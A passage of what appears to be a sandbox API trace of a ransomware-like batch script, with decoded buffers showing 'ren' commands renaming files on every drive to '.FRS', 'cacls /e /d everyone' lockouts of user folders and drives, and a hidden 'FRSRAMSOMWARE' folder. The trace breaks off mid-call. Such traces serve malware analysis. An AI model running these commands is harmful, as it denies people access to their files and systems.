nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0117.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0117.551] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.551] GetFileType (hFile=0x318) returned 0x1 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0117.551] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0117.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0117.551] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.551] GetFileType (hFile=0x318) returned 0x1 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0117.551] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0117.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0117.551] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.551] GetFileType (hFile=0x318) returned 0x1 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0117.552] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0117.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0117.552] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.552] GetFileType (hFile=0x318) returned 0x1 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0117.552] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0117.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0117.552] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.552] GetFileType (hFile=0x318) returned 0x1 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0117.552] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0117.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0117.552] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.552] GetFileType (hFile=0x318) returned 0x1 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0117.552] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0117.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0117.552] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.552] GetFileType (hFile=0x318) returned 0x1 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0117.552] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0117.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0117.553] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.553] GetFileType (hFile=0x318) returned 0x1 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0117.553] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0117.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0117.553] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.553] GetFileType (hFile=0x318) returned 0x1 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0117.553] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0117.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0117.553] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.553] GetFileType (hFile=0x318) returned 0x1 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0117.553] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0117.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0117.553] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.553] GetFileType (hFile=0x318) returned 0x1 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0117.553] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0117.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0117.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0117.553] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.554] GetFileType (hFile=0x318) returned 0x1 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0117.554] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0117.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0117.554] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.554] GetFileType (hFile=0x318) returned 0x1 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0117.554] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0117.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0117.554] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.554] GetFileType (hFile=0x318) returned 0x1 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0117.554] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0117.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0117.554] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.554] GetFileType (hFile=0x318) returned 0x1 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0117.554] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0117.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0117.554] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.554] GetFileType (hFile=0x318) returned 0x1 [0117.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0117.555] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0117.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0117.555] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.555] GetFileType (hFile=0x318) returned 0x1 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0117.555] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0117.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0117.555] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.555] GetFileType (hFile=0x318) returned 0x1 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0117.555] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0117.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0117.555] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.555] GetFileType (hFile=0x318) returned 0x1 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0117.555] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0117.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0117.555] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.555] GetFileType (hFile=0x318) returned 0x1 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0117.555] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0117.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0117.556] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.556] GetFileType (hFile=0x318) returned 0x1 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0117.556] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0117.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0117.556] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.556] GetFileType (hFile=0x318) returned 0x1 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0117.556] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0117.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0117.556] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.556] GetFileType (hFile=0x318) returned 0x1 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0117.556] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0117.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0117.556] SetFilePointer (in: 